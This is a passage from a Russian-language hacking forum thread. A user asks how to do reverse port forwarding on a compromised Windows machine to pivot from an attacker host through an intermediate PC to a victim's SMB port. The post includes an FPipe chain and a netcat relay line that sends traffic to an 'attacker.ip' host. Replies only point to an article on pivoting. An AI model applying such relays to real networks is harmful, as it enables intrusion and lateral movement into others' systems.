• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Проброс портов реверсионно

m0nstr

Green Team
19.06.2018
95
71
Вот не спица мне ночами, всякую фигню выдумываю. Есть задача: на Виндах пробросить порт за экраном реверсионно? Люблю реал-квесты, и это один из них.
Есть Мастдай, под рутом. Утилит не так много по редиректу для Окон, но не могу найти ту которая бы поддерживала реверс. Может у кого есть идеи как это можно сделать?

В частности, вот такая схема работает:
192.168.1.35:445 <- FPipe.exe -l 4445 -r 445 192.168.1.35 <- VPN 172.16.1.2:4445 <- nmap 172.16.1.2 -p4445 = successfuly
тееь нужна схема без VPN, что-то вроде такого:
192.168.1.35:445 <- nc -lp 4445 | nc attacker.ip 4446 -> nc -lp 4446 (атакер) <- nmap 127.0.0.1 -p4446 = wtf?
как-то так. обиснил как смог)

вошпем: нужен реверсионный проброс порта. впн поднимать хлопотно, а лень, как известно, - двигатель прогресса.
 
  • Нравится
Реакции: Sphinx
Думаю, данный материал должен прояснить сложившуюся ситуацию:
И, разумеется, для более чёткого понимания — демонстрация работы системы:
Возможно, в статье недостаточно материала по вопросу, однако, при желании можно найти всё необходимое.
С уважением.
 
спасибо за ответ. мне не нужен шелл, он уже есть. мне нужен проброс: атакер -> промежуточный пк -> жертва. при том что промежуточный пк должен выступать как прокси средствами netcat. такое возможно?
 
  • Нравится
Реакции: Sphinx
Pivoting или проброс портов
на Окнах не работает. эту статью я читал, после нее обратился сюда. На Окнах нельзя создать именованный канал в файл, связь обрывается с ошибкой переполнения на стороне промежут. ПК
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab